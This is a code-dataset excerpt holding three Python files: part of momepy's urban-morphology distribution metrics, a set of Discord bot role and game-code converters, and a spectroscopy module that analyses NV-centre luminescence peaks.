results_list.append(abs(row[orientations] - tessellation[tessellation[unique_id] == row[unique_id]][cell_orientations].iloc[0]))\n\n series = pd.Series(results_list)\n if 'mm_o' in objects.columns:\n objects.drop(columns=['mm_o'], inplace=True)\n if 'mm_o' in tessellation.columns:\n tessellation.drop(columns=['mm_o'], inplace=True)\n print('Cell alignments calculated.')\n return series\n\n\n\ndef alignment(objects, orientations, tessellation, unique_id, spatial_weights=None):\n\n \"\"\"\n Calculate the mean deviation of solar orientation of objects on adjacent cells from an object\n\n .. math::\n \\\\frac{1}{n}\\\\sum_{i=1}^n dev_i=\\\\frac{dev_1+dev_2+\\\\cdots+dev_n}{n}\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n orientations : str, list, np.array, pd.Series\n the name of the dataframe column, np.array, or pd.Series where is stored object orientation value\n (can be calculated using :py:func:`momepy.orientation`)\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of weights_matrix.\n It is crucial to use exactly same input as was used during the calculation of weights matrix.\n If weights_matrix is None, tessellation is used to calulate it.\n unique_id : str\n the name of the dataframe column with unique id shared between a cell and a building\n (must be present in both geodataframes)\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> buildings_df['alignment'] = momepy.alignment(buildings_df, 'bl_orient', tessellation_df, 'uID')\n Calculating alignments...\n Calculating spatial weights...\n Spatial weights ready...\n 100%|██████████| 144/144 [00:01<00:00, 140.84it/s]\n Alignments calculated.\n >>> buildings_df['alignment'][0]\n 18.299481296455237\n \"\"\"\n # define empty list for results\n results_list = []\n\n if not isinstance(orientations, str):\n objects['mm_o'] = orientations\n orientations = 'mm_o'\n\n print('Calculating alignments...')\n\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(tessellation)\n print('Spatial weights ready...')\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n neighbours = spatial_weights.neighbors[uid]\n neighbours_ids = []\n\n for n in neighbours:\n uniq = tessellation.iloc[n][unique_id]\n neighbours_ids.append(uniq)\n\n orientation = []\n for i in neighbours_ids:\n ori = objects.loc[objects[unique_id] == i].iloc[0][orientations]\n orientation.append(ori)\n\n deviations = []\n for o in orientation:\n dev = abs(o - row[orientations])\n deviations.append(dev)\n\n if deviations:\n results_list.append(statistics.mean(deviations))\n else:\n results_list.append(0)\n\n series = pd.Series(results_list)\n\n if 'mm_o' in objects.columns:\n objects.drop(columns=['mm_o'], inplace=True)\n\n print('Alignments calculated.')\n return series\n\n\ndef neighbour_distance(objects, tessellation, unique_id, spatial_weights=None):\n \"\"\"\n Calculate the mean distance to buildings on adjacent cells\n\n .. math::\n \\\\frac{1}{n}\\\\sum_{i=1}^n dist_i=\\\\frac{dist_1+dist_2+\\\\cdots+dist_n}{n}\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of spatial_weights.\n It is crucial to use exactly same input as was used durign the calculation of weights matrix.\n If spatial_weights is None, tessellation is used to calulate it.\n unique_id : str\n name of the column with unique id\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Schirmer PM and Axhausen KW (2015) A multiscale classification of urban morphology.\n Journal of Transport and Land Use 9(1): 101–130.\n\n Examples\n --------\n >>> buildings_df['neighbour_distance'] = momepy.neighbour_distance(buildings_df, tessellation_df, 'uID')\n Calculating distances...\n Calculating spatial weights...\n Spatial weights ready...\n 100%|██████████| 144/144 [00:00<00:00, 345.78it/s]\n Distances calculated.\n >>> buildings_df['neighbour_distance'][0]\n 29.18589019096464\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating distances...')\n\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(tessellation)\n print('Spatial weights ready...')\n\n # iterating over rows one by one\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n neighbours = spatial_weights.neighbors[uid]\n\n neighbours_ids = tessellation.iloc[neighbours][unique_id]\n building_neighbours = objects.loc[objects[unique_id].isin(neighbours_ids)]\n if len(building_neighbours) > 0:\n results_list.append(np.mean(building_neighbours.geometry.distance(row['geometry'])))\n else:\n results_list.append(0)\n\n series = pd.Series(results_list)\n\n print('Distances calculated.')\n return series\n\n\ndef mean_interbuilding_distance(objects, tessellation, unique_id, spatial_weights=None, spatial_weights_higher=None, order=3):\n \"\"\"\n Calculate the mean interbuilding distance within x topological steps\n\n Interbuilding distances are calculated between buildings on adjacent cells based on `spatial_weights`.\n\n .. math::\n\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of spatial_weights and spatial_weights_higher.\n It is crucial to use exactly same input as was used durign the calculation of weights matrix and spatial_weights_higher.\n If spatial_weights or spatial_weights_higher is None, tessellation is used to calulate it.\n unique_id : str\n name of the column with unique id\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n spatial_weights_higher : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity of higher order will be calculated\n based on tessellation\n order : int\n Order of Queen contiguity\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n ADD, but it is adapted quite a lot.\n\n Notes\n -----\n Fix terminology, it is unclear.\n Fix UserWarning.\n\n Examples\n --------\n >>> buildings_df['mean_interbuilding_distance'] = momepy.mean_interbuilding_distance(buildings_df, tessellation_df, 'uID')\n Calculating mean interbuilding distances...\n Generating weights matrix (Queen)...\n Generating weights matrix (Queen) of 3 topological steps...\n Generating adjacency matrix based on weights matrix...\n Computing interbuilding distances...\n 100%|██████████| 746/746 [00:03<00:00, 200.14it/s]\n Computing mean interbuilding distances...\n 100%|██████████| 144/144 [00:00<00:00, 317.42it/s]\n Mean interbuilding distances calculated.\n >>> buildings_df['mean_interbuilding_distance'][0]\n 29.305457092042744\n \"\"\"\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n print('Calculating mean interbuilding distances...')\n if spatial_weights is None:\n print('Generating weights matrix (Queen)...')\n from libpysal.weights import Queen\n # matrix to capture interbuilding relationship\n spatial_weights = Queen.from_dataframe(tessellation)\n\n if spatial_weights_higher is None:\n print('Generating weights matrix (Queen) of {} topological steps...'.format(order))\n from momepy import Queen_higher\n # matrix to define area of analysis (more steps)\n spatial_weights_higher = Queen_higher(k=order, geodataframe=tessellation)\n\n # define empty list for results\n results_list = []\n\n print('Generating adjacency matrix based on weights matrix...')\n # define adjacency list from lipysal\n adj_list = spatial_weights.to_adjlist()\n adj_list['distance'] = -1\n\n print('Computing interbuilding distances...')\n # measure each interbuilding distance of neighbours and save them to adjacency list\n for index, row in tqdm(adj_list.iterrows(), total=adj_list.shape[0]):\n inverted = adj_list[(adj_list.focal == row.neighbor)][(adj_list.neighbor == row.focal)].iloc[0]['distance']\n if inverted == -1:\n object_id = tessellation.iloc[row.focal.astype(int)][unique_id]\n building_object = objects.loc[objects[unique_id] == object_id]\n\n neighbours_id = tessellation.iloc[row.neighbor.astype(int)][unique_id]\n building_neighbour = objects.loc[objects[unique_id] == neighbours_id]\n adj_list.loc[index, 'distance'] = building_neighbour.iloc[0].geometry.distance(building_object.iloc[0].geometry)\n else:\n adj_list.at[index, 'distance'] = inverted\n\n print('Computing mean interbuilding distances...')\n # iterate over objects to get the final values\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n # id to match spatial weights\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n # define neighbours based on weights matrix defining analysis area\n neighbours = spatial_weights_higher.neighbors[uid]\n neighbours.append(uid)\n if neighbours:\n selection = adj_list[adj_list.focal.isin(neighbours)][adj_list.neighbor.isin(neighbours)]\n results_list.append(np.nanmean(selection.distance))\n\n series = pd.Series(results_list)\n print('Mean interbuilding distances calculated.')\n return series\n\n\ndef neighbouring_street_orientation_deviation(objects):\n \"\"\"\n Calculate the mean deviation of solar orientation of adjacent streets\n\n Orientation of street segment is represented by the orientation of line\n connecting first and last point of the segment.\n\n .. math::\n \\\\frac{1}{n}\\\\sum_{i=1}^n dev_i=\\\\frac{dev_1+dev_2+\\\\cdots+dev_n}{n}\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing street network to analyse\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n Examples\n --------\n >>> streets_df['orient_dev'] = momepy.neighbouring_street_orientation_deviation(streets_df)\n Calculating street alignments...\n Preparing street orientations...\n Generating spatial index...\n 100%|██████████| 33/33 [00:00<00:00, 249.02it/s]\n Street alignments calculated.\n >>> streets_df['orient_dev'][6]\n 7.043096518688273\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating street alignments...')\n\n def azimuth(point1, point2):\n '''azimuth between 2 shapely points (interval 0 - 180)'''\n angle = np.arctan2(point2.x - point1.x, point2.y - point1.y)\n return np.degrees(angle)if angle > 0 else np.degrees(angle) + 180\n\n # iterating over rows one by one\n print(' Preparing street orientations...')\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n\n start = Point(row['geometry'].coords[0])\n end = Point(row['geometry'].coords[-1])\n az = azimuth(start, end)\n if 90 > az >= 45:\n diff = az - 45\n az = az - 2 * diff\n elif 135 > az >= 90:\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n elif 181 > az >= 135:\n diff = az - 135\n az = az - 2 * diff\n diff = az - 90\n az = az - 2 * diff\n diff = az - 45\n az = az - 2 * diff\n results_list.append(az)\n series = pd.Series(results_list)\n\n objects['tmporient'] = series\n\n print(' Generating spatial index...')\n sindex = objects.sindex\n results_list = []\n\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n possible_neighbors_idx = list(sindex.intersection(row.geometry.bounds))\n possible_neighbours = objects.iloc[possible_neighbors_idx]\n neighbors = possible_neighbours[possible_neighbours.intersects(row.geometry)]\n neighbors.drop([index])\n\n orientations = []\n for idx, r in neighbors.iterrows():\n orientations.append(r.tmporient)\n\n deviations = []\n for o in orientations:\n dev = abs(o - row.tmporient)\n deviations.append(dev)\n\n if deviations:\n results_list.append(np.mean(deviations))\n else:\n results_list.append(0)\n\n series = pd.Series(results_list)\n objects.drop(['tmporient'], axis=1)\n print('Street alignments calculated.')\n return series\n\n\ndef building_adjacency(objects, tessellation, spatial_weights=None, spatial_weights_higher=None, order=3, unique_id='uID'):\n \"\"\"\n Calculate the level of building adjacency\n\n Building adjacency reflects how much buildings tend to join together into larger structures.\n It is calculated as a ratio of joined built-up structures and buildings within k topological steps.\n\n .. math::\n\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n tessellation : GeoDataFrame\n GeoDataFrame containing morphological tessellation - source of spatial_weights and spatial_weights_higher.\n It is crucial to use exactly same input as was used durign the calculation of weights matrix and spatial_weights_higher.\n If spatial_weights or spatial_weights_higher is None, tessellation is used to calulate it.\n spatial_weights : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n spatial_weights_higher : libpysal.weights, optional\n spatial weights matrix - If None, Queen contiguity of higher order will be calculated\n based on tessellation\n order : int\n Order of Queen contiguity\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Vanderhaegen S and Canters F (2017) Mapping urban form and function at city\n block level using spatial metrics. Landscape and Urban Planning 167: 399–409.\n\n Examples\n --------\n >>> buildings_df['adjacency'] = momepy.building_adjacency(buildings_df, tessellation_df, unique_id='uID')\n Calculating adjacency...\n Calculating spatial weights...\n Spatial weights ready...\n Generating weights matrix (Queen) of 3 topological steps...\n Generating dictionary of built-up patches...\n 100%|██████████| 144/144 [00:00<00:00, 9301.73it/s]\n Calculating adjacency within k steps...\n 100%|██████████| 144/144 [00:00<00:00, 335.55it/s]\n Adjacency calculated.\n >>> buildings_df['adjacency'][10]\n 0.23809523809523808\n \"\"\"\n # define empty list for results\n results_list = []\n\n print('Calculating adjacency...')\n\n if not all(tessellation.index == range(len(tessellation))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n # if weights matrix is not passed, generate it from objects\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(objects, silence_warnings=True)\n print('Spatial weights ready...')\n\n if spatial_weights_higher is None:\n print('Generating weights matrix (Queen) of {} topological steps...'.format(order))\n from momepy import Queen_higher\n # matrix to define area of analysis (more steps)\n spatial_weights_higher = Queen_higher(k=order, geodataframe=tessellation)\n\n print('Generating dictionary of built-up patches...')\n # dict to store nr of courtyards for each uID\n patches = {}\n jID = 1\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n\n # if the id is already present in courtyards, continue (avoid repetition)\n if index in patches:\n continue\n else:\n to_join = [index] # list of indices which should be joined together\n neighbours = [] # list of neighbours\n weights = spatial_weights.neighbors[index] # neighbours from spatial weights\n for w in weights:\n neighbours.append(w) # make a list from weigths\n\n for n in neighbours:\n while n not in to_join: # until there is some neighbour which is not in to_join\n to_join.append(n)\n weights = spatial_weights.neighbors[n]\n for w in weights:\n neighbours.append(w) # extend neighbours by neighbours of neighbours :)\n for b in to_join:\n patches[b] = jID # fill dict with values\n jID = jID + 1\n\n print('Calculating adjacency within k steps...')\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n uid = tessellation.loc[tessellation[unique_id] == row[unique_id]].index[0]\n neighbours = spatial_weights_higher.neighbors[uid]\n\n neighbours_ids = tessellation.iloc[neighbours][unique_id]\n neighbours_ids = neighbours_ids.append(pd.Series(row[unique_id], index=[index]))\n building_neighbours = objects.loc[objects[unique_id].isin(neighbours_ids)]\n indices = list(building_neighbours.index)\n patches_sub = [patches[x] for x in indices]\n patches_nr = len(set(patches_sub))\n\n results_list.append(patches_nr / len(building_neighbours))\n\n series = pd.Series(results_list)\n\n print('Adjacency calculated.')\n return series\n\n\ndef neighbours(objects, spatial_weights=None, weighted=False):\n \"\"\"\n Calculate the number of topological neighbours of each object.\n\n Topological neighbours are defined by queen adjacency. If weighted=True, number of neighbours\n will be divided by the perimeter of object, to return relative value.\n\n .. math::\n\n\n Parameters\n ----------\n objects : GeoDataFrame\n GeoDataFrame containing objects to analyse\n spatial_weights : libpysal.weights (default None)\n spatial weights matrix - If None, Queen contiguity matrix will be calculated\n based on tessellation\n weighted : bool (default False)\n if weighted=True, number of neighbours will be divided by the perimeter of object, to return relative value\n\n Returns\n -------\n Series\n Series containing resulting values.\n\n References\n ---------\n Hermosilla T, Ruiz LA, Recio JA, et al. (2012) Assessing contextual descriptive features\n for plot-based classification of urban areas. Landscape and Urban Planning, Elsevier B.V.\n 106(1): 124–137.\n\n Examples\n --------\n >>> tessellation_df['neighbours'] = momepy.neighbours(tessellation_df)\n Calculating spatial weights...\n Spatial weights ready...\n Calculating neighbours...\n 100%|██████████| 144/144 [00:00<00:00, 6909.50it/s]\n Neighbours calculated.\n >>> tessellation_df['neighbours'][0]\n 4\n \"\"\"\n\n if not all(objects.index == range(len(objects))):\n raise ValueError('Index is not consecutive range 0:x, spatial weights will not match objects.')\n\n # if weights matrix is not passed, generate it from objects\n if spatial_weights is None:\n print('Calculating spatial weights...')\n from libpysal.weights import Queen\n spatial_weights = Queen.from_dataframe(objects, silence_warnings=True)\n print('Spatial weights ready...')\n\n print('Calculating neighbours...')\n neighbours = []\n for index, row in tqdm(objects.iterrows(), total=objects.shape[0]):\n if weighted is True:\n neighbours.append(spatial_weights.cardinalities[index] / row.geometry.length)\n else:\n neighbours.append(spatial_weights.cardinalities[index])\n\n series = pd.Series(neighbours)\n print('Neighbours calculated.')\n return series\n\n\ndef node_degree(graph, name='degree'):\n \"\"\"\n Calculates node degree for each node.\n\n Wrapper around `networkx.degree()`\n\n .. math::\n\n\n Parameters\n ----------\n graph : networkx.Graph\n Graph representing street network.\n Ideally genereated from GeoDataFrame using :py:func:`momepy.gdf_to_nx`\n name : str, optional\n calculated attribute name\n\n Returns\n -------\n Graph\n networkx.Graph\n\n References\n ----------\n\n Examples\n --------\n\n \"\"\"\n netx = graph\n\n degree = dict(nx.degree(netx))\n nx.set_node_attributes(netx, degree, name)\n\n return netx\n","sub_path":"momepy/distribution.py","file_name":"distribution.py","file_ext":"py","file_size_in_byte":34528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"460959053","text":"from discord.ext import commands\nimport config\n\nrole_converter = commands.RoleConverter()\n\n\nclass CustomRoleConverter(commands.Converter):\n async def convert(self, context, argument):\n\n role_words = argument.lower().lstrip('@').split(' ')\n parsed_role_words = []\n for word in role_words:\n if word in ['gms', 'kms', 'gmsm', 'thms', 'kmsm', 'gms2', 'kms2', 'il', 'fp']:\n parsed_role_words.append(word.upper())\n else:\n parsed_role_words.append(word.capitalize())\n\n parsed_role_name = ' '.join(parsed_role_words)\n try:\n role = await role_converter.convert(context, parsed_role_name)\n if role.name not in config.AUTOASIGN_ROLES:\n raise commands.BadArgument(\n f'{role.mention} is not auto-assignable. '\n f'Please use `!list` to see a full list of assignable roles.')\n return role\n except commands.BadArgument:\n raise commands.BadArgument(f'`{parsed_role_name}` role not found.')\n\n\nclass GameCodeConverter(commands.Converter):\n code_to_game = {\n 'hi3': 'Honkai Impact 3rd'\n }\n\n async def convert(self, context, argument):\n _argument = argument.lower()\n if _argument in self.code_to_game:\n return self.code_to_game[_argument]\n else:\n iter_ = [f\"{key:<5} : {value}\\n\" for key, value in self.code_to_game.items()]\n raise commands.BadArgument(\n f'`{argument}` is not a valid game code. Allowed game codes:'\n f'```\\n'\n f'{\"\".join(iter_)}'\n f'```')\n","sub_path":"francis/converters.py","file_name":"converters.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"105221907","text":"### My name is Shanying! I wrote this piece'o shit! Today's date is 04/11/2013\n### This is now the new version where I make shit awesome!!\n### Test pushing.\n\nimport pylab as py\nimport winspec\nfrom numpy import ndarray\n\nclass Spectrum:\n \"\"\"\n This class loads a .SPE file or .txt file\n for .txt file (saved from Clarke's Raman), \n first column is wavelength and 2nd column is luminescence\n \"\"\"\n\n @classmethod\n def fromFile(cls,fname):\n return cls(fname = fname)\n \n def __init__(self,**kwargs):\n self._fname = ''\n self._wavelen = []\n self._lum = []\n \n if 'fname' in kwargs:\n\n self._fname = kwargs['fname']\n self._wavelen = py.loadtxt(self._fname)[:,0]\n self._lum = py.loadtxt(self._fname)[:,1]\n \n assert len(self._wavelen) == len(self._lum), \"Wavelength and luminescence length should match\"\n \n else:\n assert type(kwargs['wavelen']) in [ndarray, list], \"first input must be list or ndarray\"\n assert type(kwargs['lum']) in [ndarray, list], \"second input must be list or ndarray\"\n \n self._wavelen = kwargs['wavelen']\n self._lum = kwargs['lum'] \n \n if self._wavelen[0] > self._wavelen[-1]:\n self._wavelen = self._wavelen[::-1]\n self._lum = self._lum[::-1]\n \n def get_wavelen(self):\n return self._wavelen\n \n def get_lum(self):\n return self._lum\n \n def get_lumAtWavelen(self, wavelen):\n lum = None\n index = py.where(self._wavelen > wavelen)[0][0]\n lum = self._lum[index]\n \n assert lum != None, \"wavelength out of bound\"\n return lum\n \n def int_peak(self,fitrange=None, intrange=None, normalize=False, plot=False, npoints=10):\n \"\"\"\n Fits a linear background, subtracts the background, and integrates. Intended to be used for integrating peaks.\n \n wavelen : list\n list of wavelengths in nm. Can be sorted from low to high or high to low\n lum : list\n list of luminescence\n fitrange : 2-element list, optional\n Defaults to the span of the data. Input: [low nm, high nm]\n intrange : 2-element list, optional\n Defaults to the span of the data or fitrange (if given). Input: [low nm, high nm]\n normalize : boolean, optional\n Default is False\n plot : boolean, optional\n Default is False. Plots the original data, the linear background, and the data with the background subtracted\n npoints : int\n Default is 10. Number of points above and below the given fitrange point to average over.\n \"\"\"\n if fitrange is None:\n fitindex=[0+npoints/2, len(self._wavelen)-1-npoints/2]\n else:\n fitindex=[0, 0]\n fitindex[0]=py.where(self._wavelen>fitrange[0])[0][0]\n fitindex[1]=py.where(self._wavelen>fitrange[1])[0][0]\n \n wavelenfit=py.concatenate((self._wavelen[fitindex[0]-npoints/2:fitindex[0]+npoints/2], \n self._wavelen[fitindex[1]-npoints/2:fitindex[1]+npoints/2]))\n lumfit=py.concatenate((self._lum[fitindex[0]-npoints/2:fitindex[0]+npoints/2], \n self._lum[fitindex[1]-npoints/2:fitindex[1]+npoints/2]))\n linearfit = py.polyfit(wavelenfit, lumfit, 1)\n linear_bg = py.polyval( linearfit, self._wavelen[fitindex[0]:fitindex[1]+1] )\n wavelen_bg = self._wavelen[fitindex[0]:fitindex[1]+1].copy()\n lum_bg = self._lum[fitindex[0]:fitindex[1]+1].copy()\n lum_bg -= linear_bg\n \n if plot is True:\n py.plot(self._wavelen,self._lum,'k')\n py.plot(wavelen_bg,linear_bg,'k:')\n py.plot(wavelen_bg,lum_bg,'r')\n py.show()\n \n intindex=[0,0]\n if intrange is None:\n wavelen_int = wavelen_bg\n lum_int = lum_bg \n else:\n intindex[0]=py.where(wavelen_bg>intrange[0])[0][0]\n intindex[1]=py.where(wavelen_bg>intrange[1])[0][0] \n wavelen_int = wavelen_bg[intindex[0]:intindex[1]+1]\n lum_int = lum_bg[intindex[0]:intindex[1]+1]\n \n peak_area = py.trapz(lum_int, x=wavelen_int)\n return peak_area\n \n def get_NVratio(self, NV0fitrange = [567, 581], NV0intrange = [573.5, 581], NVmfitrange = [633, 644],plot=False):\n \"\"\"\n Returns a list of NV0 ZPL area, NVm ZPl area, and NVm/(NV0+NVm) ratio.\n \n NV0fitrange: list, optional\n Default [567, 581] (nm)\n NV0intrange: list, optional\n Default [573.5, 581] (nm)\n NVmfitrange: list, optional\n Default [633, 644] (nm)\n plot: boolean, optional\n Default False\n \"\"\"\n NV0=self.int_peak(fitrange=NV0fitrange, intrange=NV0intrange, plot=plot)\n NVm=self.int_peak(fitrange=NVmfitrange,plot=plot)\n \n return [NV0,NVm,NVm/(NV0+NVm)]\n \n def plot(self,*args,**kwargs):\n py.plot(self._wavelen, self._lum,*args,**kwargs)\n \n# def load_520exc(files,NV0fitrange=[573,586], NVmfitrange=[636,648]):\n# \"\"\"\n# files: list\n# \"\"\"\n# data=[winspec.Spectrum(f) for f in files]\n# \n# NV=py.zeros((py.size(data),3))\n# NV[:,0]=[int_peak(d.wavelen, d.lum, fitrange=NV0fitrange) for d in data]\n# NV[:,1]=[int_peak(d.wavelen, d.lum,fitrange=NVmfitrange) for d in data]\n# NV[:,2]=NV[:,1]/(NV[:,0]+NV[:,1])\n# \n# return NV\n#\n# def load_highgrating(files,NV0fitrange=[568,580],NV0intrange=[574,580],NVmfitrange=None):\n# \"\"\"\n# files: list\n# format: str\n# \"\"\"\n# dataNV0=[]\n# dataNVm=[]\n# for f in files:\n# if f.find('NV0') is not -1:\n# dataNV0.append(winspec.Spectrum(f))\n# elif f.find('NVm') is not -1:\n# dataNVm.append(winspec.Spectrum(f))\n# else:\n# raise ValueError(f,'filename must contain either \"NV0\" or \"NVm\"')\n# \n# data=py.vstack([dataNV0,dataNVm])\n# NV=py.zeros((py.size(dataNV0),3))\n# \n# NV[:,0]=[int_peak(d.wavelen, d.lum, fitrange=NV0fitrange,intrange=NV0intrange) for d in dataNV0]\n# NV[:,1]=[int_peak(d.wavelen, d.lum,fitrange=NVmfitrange) for d in dataNVm]\n# NV[:,2]=NV[:,1]/(NV[:,0]+NV[:,1])\n# \n# return NV\n \n\nclass Map:\n def __init__(self,fname):\n \"\"\"\n initializes Map object, and loads a z scan or x, y, z map. \n \"\"\"\n self._specList=[]\n self._focusedSpec = []\n self._z=[]\n self._nfocus=0\n self._fname = fname\n self._wavelen = py.loadtxt(self._fname)[0]\n \n isReversed = self._wavelen[0] > self._wavelen[-1]\n if isReversed:\n self._wavelen = self._wavelen[::-1]\n \n data = py.loadtxt(self._fname,skiprows=1)\n \n # check what kind of a file it is\n lendiff = py.shape(data)[1] - len(self._wavelen)\n if lendiff == 1:\n self.load_focus(data, isReversed)\n if lendiff == 3:\n self.load_map(data, isReversed)\n \n def get_wavelen(self):\n return self._wavelen\n \n def get_specList(self):\n return self._specList\n \n def get_focusedSpec(self):\n return self._focusedSpec\n \n def get_zvals(self):\n return self._z\n \n def load_focus(self, data, isReversed):\n \"\"\"\n return list of Spectrum \n \"\"\"\n self._z=data[:,0]\n self._nfocus=len(data[:,0])\n \n spectrums = []\n for focus in data:\n lum = focus[1:][::-1] if isReversed else focus[1:]\n spectrums.append(Spectrum(wavelen=self._wavelen,lum=lum))\n \n self._specList = [spectrums] # only one point\n \n assert len(self._specList[0]) == self._nfocus, \"Num focus points must equal num of luminescence\"\n \n def load_map(self, data, isReversed):\n \n # sort\n data=list(data)\n data.sort( key=lambda x: x[1])\n data.sort( key=lambda x: x[2])\n data=py.asarray(data)\n \n # find nfocus\n firstfocus=data[0][0]\n for row in data[1:]:\n self._nfocus+=1\n if row[0] == firstfocus:\n break\n \n # extract lum data \n for row in data:\n if isReversed:\n lum = row[3:][::-1]\n else:\n lum = row[3:]\n self._specList.append(Spectrum(wavelen=self._wavelen,lum=lum))\n\n # split specList into points, ie. [[z1, z1, z3],[z1,z2,z3]]\n self._specList=[self._specList[i:i+self._nfocus] for i in range(0,len(self._specList),self._nfocus)]\n self._z = (data[:,0][0:self._nfocus])\n \n assert len(self._z) == len(self._specList[0]), \"len of focuses must match specList sublist length\" \n\n def find_focus(self, wavelen,plot=False):\n \"\"\"\n for each point, finds the focus of highest intensity at given wavelength\n saves the Spectrum with \"best focus\" in a new list called self._focusedSpec\n \n returns z values of the best focus at each point\n \n wavelen: int or float\n Finds focus with max luminescence at this wavelength (nm) \n \"\"\"\n lum = []\n bestz=[]\n for point in self._specList:\n a=[]\n if plot == True:\n py.figure()\n for spec in point:\n lum.append(spec.get_lumAtWavelen(wavelen))\n if plot == True:\n spec.plot()\n if plot == True:\n for z in self._z:\n a.append(str(z))\n py.legend(a)\n maxlum_index = lum.index(max(lum))\n self._focusedSpec.append(point[maxlum_index])\n bestz.append(self._z[maxlum_index])\n lum = []\n \n #print bestz\n return bestz\n \n def define_focus(self,zindexlist):\n \"\"\"\n zindexlist: list\n List of indexes for the desired focus\n \"\"\"\n assert len(zindexlist) == len(self._specList), 'length of zindexlist must match number of points'\n self._focusedSpec=[]\n for point, index in zip(self._specList,zindexlist):\n self._focusedSpec.append(point[index])\n \n def get_NVratio(self,maxwavelen=638,*args,**kwargs):\n \"\"\"\n Finds best focus at given wavelength for each point, \n \n maxwavelen: int or float, optional\n Default is 638nm, maximizing to NVm ZPL\n \"\"\"\n NVvalues=[]\n if self._focusedSpec==[]:\n indexList = self.find_focus(maxwavelen)\n \n for point in self._focusedSpec:\n NVvalues.append(point.get_NVratio(*args,**kwargs))\n \n NVvalues = py.asarray(NVvalues)\n \n return NVvalues\n\n def plot_points(self, *args, **kwargs):\n \"\"\" \n Plots focused points\n to plot legend, use showlegend = True keyword argument\n \"\"\"\n assert len(self._focusedSpec) != 0, \"haven't found focus yet\"\n \n for i in range(len(self._focusedSpec)):\n if i > 6:\n fmt = '--'\n else:\n fmt = '-'\n self._focusedSpec[i].plot(label=str(i),linestyle=fmt,*args, **kwargs)\n py.legend()\n \n def remove_point(self,pointindex):\n \"\"\"\n Removes crappy points as necessary, inputting an index or a list of index\n \"\"\"\n assert self._focusedSpec !=[], 'FocusedSpec list must have values'\n # need to insert some way of making sure the list of pointindexes are sorted from lowest to highest\n if type(pointindex) is list:\n for point in pointindex[::-1]:\n del self._focusedSpec[point]\n elif type(pointindex) is int:\n del self._focusedSpec[pointindex]\n else: \n raise 'pointindex must be either list or int'","sub_path":"NVanalysis.py","file_name":"NVanalysis.py","file_ext":"py","file_size_in_byte":12179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
